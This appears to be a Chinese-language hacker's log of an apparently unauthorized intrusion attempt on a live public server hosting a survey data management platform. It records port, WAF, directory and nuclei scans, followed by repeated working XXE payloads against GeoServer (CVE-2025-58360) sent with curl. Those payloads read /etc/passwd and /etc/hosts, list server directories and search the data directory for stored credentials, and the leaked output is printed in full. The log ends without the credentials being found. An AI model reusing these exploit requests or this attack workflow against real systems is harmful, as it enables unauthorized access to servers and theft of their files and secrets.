攻击目标
http://123.179.225.131:8989/indexHome/index.html#/login
信息收集
IP中国电信,内蒙古
抓包分析,明文,存在一个post。
发现是登陆地址,进行扫描
nmap -sS 123.179.225.131 - F -A
扫描失败
更换方式
nmap -sT 123.179.225.131 -F -A
发现基本上端口都开放了,提示是一个Debian
提示有waf
扫描端口-p 1-10000
全部开放。。。。。 像蜜罐
└─$ wafw00f http://123.179.225.131:8989
______
/ \
( W00f! )
\ ____/
,, __ 404 Hack Not Found
|`-.__ / / __ __
/" _/ /_/ \ \ / /
*===* / \ \_/ / 405 Not Allowed
/ )__// \ /
/| / /---` 403 Forbidden
\\/` \ | / _ \
`\ /_\\_ 502 Bad Gateway / / \ \ 500 Internal Error
`_____``-` /_/ \_\\
~ WAFW00F : v2.3.1 ~
The Web Application Firewall Fingerprinting Toolkit
[*] Checking http://123.179.225.131:8989
[+] The site http://123.179.225.131:8989 is behind AWS Elastic Load Balancer (Amazon) WAF.
[~] Number of requests: 2
看一下什么架构
──(root㉿Willem)-[/home/willem]
└─# whatweb http://123.179.225.131:8989/indexHome/index.html#/login
http://123.179.225.131:8989/indexHome/index.html#/login [200 OK] Country[CHINA][CN], HTML5, HTTPServer[Caddy, MinIO], IP[123.179.225.131], Script[module,text/javascript], Strict-Transport-Security[max-age=31536000; includeSubDomains], Title[地测采综合信息管理平台], UncommonHeaders[content-security-policy,x-amz-request-id,x-content-type-options], X-XSS-Protection[1; mode=block]
获取一些目录
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
# 安装依赖
pip3 install -r requirements.txt
# 开始扫描 (重点扫描 js, json, php, zip 后缀)
python3 dirsearch.py -u http://123.179.225.131:8989 -e js,json,php,zip _|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: js, json, php, zip | HTTP method: GET | Threads: 25
Wordlist size: 11252
Target: http://123.179.225.131:8989/
[11:31:04] Scanning:
[11:32:25] 404 - 42B - /api/
[11:32:25] 404 - 42B - /api/2/issue/createmeta
[11:32:25] 404 - 42B - /api/_swagger_/
[11:32:25] 404 - 42B - /api/2/explore/
[11:32:25] 404 - 42B - /api/api
[11:32:25] 404 - 42B - /api/api-docs
[11:32:25] 404 - 42B - /api/apidocs
[11:32:25] 404 - 42B - /api/apidocs/swagger.json
[11:32:25] 404 - 42B - /api/application.wadl
[11:32:25] 404 - 42B - /api/cask/graphql
[11:32:25] 404 - 42B - /api/batch
[11:32:25] 404 - 42B - /api/chat
[11:32:25] 404 - 42B - /api/config
[11:32:25] 404 - 42B - /api/config.json
[11:32:25] 404 - 42B - /api/copy
[11:32:25] 404 - 42B - /api/credentials.json
[11:32:25] 404 - 42B - /api/credential.json
[11:32:25] 404 - 42B - /api/create
[11:32:25] 404 - 42B - /api/database.json
[11:32:25] 404 - 42B - /api/delete
[11:32:25] 404 - 42B - /api/docs
[11:32:25] 404 - 42B - /api/docs/
[11:32:25] 404 - 42B - /api/embed
[11:32:25] 404 - 42B - /api/embeddings
[11:32:25] 404 - 42B - /api/error_log
[11:32:25] 404 - 42B - /api/heartbeat
[11:32:25] 404 - 42B - /api/generate
[11:32:25] 404 - 42B - /api/index.html
[11:32:25] 404 - 42B - /api/jsonws
[11:32:25] 404 - 42B - /api/jsonws/invoke
[11:32:25] 404 - 42B - /api/package_search/v4/documentation
[11:32:25] 404 - 42B - /api/login.json
[11:32:25] 404 - 42B - /api/profile
[11:32:25] 404 - 42B - /api/proxy
[11:32:25] 404 - 42B - /api/ps
[11:32:25] 404 - 42B - /api/push
[11:32:25] 404 - 42B - /api/show
[11:32:25] 404 - 42B - /api/__swagger__/
[11:32:25] 404 - 42B - /api/snapshots
[11:32:25] 404 - 42B - /api/swagger
[11:32:25] 404 - 42B - /api/spec/swagger.json
[11:32:25] 404 - 42B - /api/swagger-ui.html
[11:32:25] 404 - 42B - /api/swagger.json
[11:32:25] 404 - 42B - /api/swagger.yml
[11:32:26] 404 - 42B - /api/swagger/index.html
[11:32:26] 404 - 42B - /api/swagger/static/index.html
[11:32:26] 404 - 42B - /api/swagger/swagger
[11:32:26] 404 - 42B - /api/swagger/ui/index
[11:32:26] 404 - 42B - /api/tags
[11:32:26] 404 - 42B - /api/user.json
[11:32:26] 404 - 42B - /api/timelion/run
[11:32:26] 404 - 42B - /api/users.json
[11:32:26] 404 - 42B - /api/v1
[11:32:26] 404 - 42B - /api/v1/
[11:32:26] 404 - 42B - /api/v1/swagger.json
[11:32:26] 404 - 42B - /api/v1/swagger.yaml
[11:32:26] 404 - 42B - /api/v2
[11:32:26] 404 - 42B - /api/v2/swagger.json
[11:32:26] 404 - 42B - /api/v2/helpdesk/discover
[11:32:26] 404 - 42B - /api/v2/swagger.yaml
[11:32:26] 404 - 42B - /api/v2/
[11:32:26] 404 - 42B - /api/v3
[11:32:26] 404 - 42B - /api/v4
[11:32:26] 404 - 42B - /api/vendor/phpunit/phpunit/phpunit
[11:32:26] 200 - 105B - /api/version
[11:32:26] 404 - 42B - /api/pull
[11:32:26] 404 - 42B - /api/whoami
[11:32:26] 404 - 42B - /api/swagger.yaml
[11:32:43] 404 - 42B - /cloud/
[11:33:05] 307 - 63B - /file/ -> http://123.179.225.131:5000
[11:33:06] 404 - 207B - /files/
[11:33:06] 404 - 207B - /files/cache/
[11:33:07] 404 - 207B - /files/tmp/
[11:33:06] 404 - 18KB - /Files/binder.autosave
[11:33:06] 404 - 18KB - /Files/binder.backup
[11:33:07] 404 - 18KB - /Files/Docs/docs.checksum
[11:33:07] 404 - 18KB - /Files/search.indexes
[11:33:07] 404 - 18KB - /Files/user.lock
[11:33:07] 404 - 46B - /flow/registries
[11:33:11] 200 - 697B - /geoserver/index.html
[11:33:29] 302 - 0B - /login -> /indexHome/index.html
[11:34:33] 404 - 42B - /upload/
[11:34:33] 404 - 42B - /upload/1.php
[11:34:33] 404 - 42B - /upload/b_user.csv
[11:34:33] 404 - 42B - /upload/2.php
[11:34:33] 404 - 42B - /upload/b_user.xls
[11:34:33] 404 - 42B - /upload/loginIxje.php
[11:34:33] 404 - 42B - /upload/test.php
[11:34:33] 404 - 42B - /upload/test.txt
[11:34:33] 404 - 42B - /upload/upload.php
扫一下nuclei发现没啥问题
~/go/bin/nuclei -u http://123.179.225.131:8989 -tags api,exposure,misconfig
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v2.9.15
projectdiscovery.io
[WRN] Found 1909 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v2.9.15 (outdated)
[INF] Current nuclei-templates version: v10.3.5 (latest)
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 1589
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 516 (Reduced 480 Requests)
[INF] Using Interactsh Server: oast.live
[CVE-2025-27505] [http] [medium] http://123.179.225.131:8989/geoserver/rest.html
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:referrer-policy] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:clear-site-data] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:permissions-policy] [http] [info] http://123.179.225.131:8989/indexHome/index.html
[http-missing-security-headers:x-frame-options] [http] [info] http://123.179.225.131:8989/indexHome/index.html
只有一个 没啥用换一个
nuclei -u http://123.179.225.131:8989 -tags geoserver
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v2.9.15
projectdiscovery.io
[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[WRN] Found 1909 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v2.9.15 (outdated)
[INF] Current nuclei-templates version: v10.3.5 (latest)
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 8
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.fun
[CVE-2025-58360] [http] [high] http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap
[CVE-2025-27505] [http] [medium] http://123.179.225.131:8989/geoserver/rest.html
[geoserver-login-panel] [http] [info] http://123.179.225.131:8989/geoserver/web/;jsessionid=177EDBE87D609BE0AF6B40DBD395A4A8?0 [2.22.0]
CVE-2025-58360 这个不错 ~/go/bin/nuclei -u http://123.179.225.131:8989 -id CVE-2025-58360 -debug [CVE-2025-58360] Dumped HTTP request for http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap
POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
Host: 123.179.225.131:8989
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 222
Accept: */*
Accept-Language: en
Content-Type: application/vnd.ogc.sld+xml
Accept-Encoding: gzip
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "/this_file_does_not_exist"> ]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer><Name>&xxe;</Name></NamedLayer>
</StyledLayerDescriptor>
[DBG] [CVE-2025-58360] Dumped HTTP response http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Access-Control-Allow-Origin: *
Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
Date: Sun, 14 Dec 2025 09:15:48 GMT
Server: Caddy
X-Frame-Options: SAMEORIGIN
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
java.lang.RuntimeException: java.io.FileNotFoundException: /this_file_does_not_exist (No such file or directory)
java.io.FileNotFoundException: /this_file_does_not_exist (No such file or directory)
/this_file_does_not_exist (No such file or directory)
</ServiceException></ServiceExceptionReport>
[CVE-2025-58360:word-1] [http] [high] http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap
[CVE-2025-58360:status-2] [http] [high] http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap
http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap
[11:33:11] 200 - 697B - /geoserver/index.html 最不想看的一个产品就是GeoServer,这次就做初步的分析吧,它还是比较好理解的。
GeoServer是一款开源的地理数据服务器,用于共享、编辑和发布地理空间数据,支持多种标准地图服务协议。
可以看目录文件,比如密码乱七八糟的,可以试试很高危险。
POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
Host: 123.179.225.131:8989
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 222
Accept: */*
Accept-Language: en
Content-Type: application/vnd.ogc.sld+xml
Accept-Encoding: gzip
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "/this_file_does_not_exist"> ]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer><Name>&xxe;</Name></NamedLayer>
</StyledLayerDescriptor>
[DBG] [CVE-2025-58360] Dumped HTTP response http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap
改造加入报错回现实curl -v -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0" >
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
#给一个root权限,查看一下是否可以ote: Unnecessary use of -X or --request, POST is already inferred.
* Trying 123.179.225.131:8989...
* Connected to 123.179.225.131 (123.179.225.131) port 8989
* using HTTP/1.x
> POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
> Host: 123.179.225.131:8989
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/vnd.ogc.sld+xml
> Content-Length: 217
>
* upload completely sent off: 217 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: *
< Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
< Date: Sun, 14 Dec 2025 08:45:55 GMT
< Server: Caddy
< X-Frame-Options: SAMEORIGIN
< Transfer-Encoding: chunked
<
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
* Connection #0 to host 123.179.225.131 left intact
</ServiceException></ServiceExceptionReport> 没有问题,但是root权限被禁用了,
willlem 又查看了其他的常见隐私高危,发现都没有,但是存在该漏洞。很奇怪!
应该是敏感被拦截了
看看是不是实体机子
└─# curl -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: a2ac9c1c8349
</ServiceException></ServiceExceptionReport>
不对劲十分不对劲
这不想主机名
看一下host
└─# curl -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/hosts">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: 127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.19.0.2 a2ac9c1c8349
</ServiceException></ServiceExceptionReport> 。。。。。。我在一个docker里面,在容器里
难道是docker部署的
上网查了安装目录,官方镜像安装地址。
tyledLayerDescriptor>'
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
java.lang.RuntimeException: java.io.FileNotFoundException: /geoserver/data_dir/security/users.xml (No such file or directory)
java.io.FileNotFoundException: /geoserver/data_dir/security/users.xml (No such file or directory)
/geoserver/data_dir/security/users.xml (No such file or directory)
</ServiceException></ServiceExceptionReport>
。。。。。。不存在
└─# curl -v -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/">
]>
<StyledLayerDescriptor version="1.0.0" >
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 123.179.225.131:8989...
* Connected to 123.179.225.131 (123.179.225.131) port 8989
* using HTTP/1.x
> POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
> Host: 123.179.225.131:8989
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/vnd.ogc.sld+xml
> Content-Length: 207
>
* upload completely sent off: 207 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: *
< Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
< Date: Sun, 14 Dec 2025 09:39:50 GMT
< Server: Caddy
< X-Frame-Options: SAMEORIGIN
< Transfer-Encoding: chunked
<
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: .dockerenv
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
* Connection #0 to host 123.179.225.131 left intact
</ServiceException></ServiceExceptionReport>
上网查了安装目录,官方镜像安装地址。
安装在这里了
我们发现了安装脚本sh
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/proc/self/cwd/">
]>
<StyledLayerDescriptor version="1.0.0" >
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 123.179.225.131:8989...
* Connected to 123.179.225.131 (123.179.225.131) port 8989
* using HTTP/1.x
> POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
> Host: 123.179.225.131:8989
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/vnd.ogc.sld+xml
> Content-Length: 221
>
* upload completely sent off: 221 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: *
< Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
< Date: Sun, 14 Dec 2025 09:39:32 GMT
< Server: Caddy
< X-Frame-Options: SAMEORIGIN
< Transfer-Encoding: chunked
<
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: apache-tomcat-9.0.68
geoserver_data
install-extensions.sh
startup.sh
* Connection #0 to host 123.179.225.131 left intact
</ServiceException></ServiceExceptionReport> 就在这个文件夹下/proc/self/cwd/geoserver_data/
─# curl -v -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/proc/self/cwd/geoserver_data/">
]>
<StyledLayerDescriptor version="1.0.0" >
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 123.179.225.131:8989...
* Connected to 123.179.225.131 (123.179.225.131) port 8989
* using HTTP/1.x
> POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
> Host: 123.179.225.131:8989
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/vnd.ogc.sld+xml
> Content-Length: 236
>
* upload completely sent off: 236 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: *
< Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
< Date: Sun, 14 Dec 2025 09:42:14 GMT
< Server: Caddy
< X-Frame-Options: SAMEORIGIN
< Transfer-Encoding: chunked
<
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: coverages
data
demo
global.xml
gwc
gwc-gs.xml
gwc-layers
layergroups
layouts
logging.xml
logs
palettes
plugIns
README.rst
security
styles
uav-data
user_projections
uuuuu
validation
wcs.xml
wfs.xml
wms.xml
wmts.xml
workspaces
www
* Connection #0 to host 123.179.225.131 left intact
</ServiceException></ServiceExceptionReport> └─# curl -v -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/proc/self/cwd/geoserver_data/logs">
]>
<StyledLayerDescriptor version="1.0.0" >
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 123.179.225.131:8989...
* Connected to 123.179.225.131 (123.179.225.131) port 8989
* using HTTP/1.x
> POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
> Host: 123.179.225.131:8989
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/vnd.ogc.sld+xml
> Content-Length: 240
>
* upload completely sent off: 240 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: *
< Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
< Date: Sun, 14 Dec 2025 09:54:40 GMT
< Server: Caddy
< X-Frame-Options: SAMEORIGIN
< Transfer-Encoding: chunked
<
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: DEFAULT_LOGGING.xml
GEOSERVER_DEVELOPER_LOGGING.xml
geoserver.log
geoserver-1.log
geoserver-2.log
GEOTOOLS_DEVELOPER_LOGGING.xml
PRODUCTION_LOGGING.xml
QUIET_LOGGING.xml
TEST_LOGGING.xml
VERBOSE_LOGGING.xml
结合nmap端口基本都打开
我怀疑这是个陷阱!!!
└─# curl -v -X POST "http://123.179.225.131:8989/geoserver/wfs?service=WMS&request=GetMap" \
-H "Content-Type: application/vnd.ogc.sld+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/proc/self/cwd/geoserver_data/gwc/u655059a316e60d27ef0cddb0_3857_2d0fc3f8/EPSG_900913_01
">
]>
<StyledLayerDescriptor version="1.0.0" >
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 123.179.225.131:8989...
* Connected to 123.179.225.131 (123.179.225.131) port 8989
* using HTTP/1.x
> POST /geoserver/wfs?service=WMS&request=GetMap HTTP/1.1
> Host: 123.179.225.131:8989
> User-Agent: curl/8.12.1
> Accept: */*
> Content-Type: application/vnd.ogc.sld+xml
> Content-Length: 295
>
* upload completely sent off: 295 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: *
< Content-Type: application/vnd.ogc.se_xml;charset=UTF-8
< Date: Sun, 14 Dec 2025 10:13:35 GMT
< Server: Caddy
< X-Frame-Options: SAMEORIGIN
< Transfer-Encoding: chunked
<
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE ServiceExceptionReport SYSTEM "http://123.179.225.131:8989/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd"> <ServiceExceptionReport version="1.1.1" > <ServiceException>
Unknown layer: 0_0
* Connection #0 to host 123.179.225.131 left intact
</ServiceException></ServiceExceptionReport>
找了半天,不知道把账号密码放哪里了。反正就这样吧燃尽了
我现在感觉像蜜罐,有waf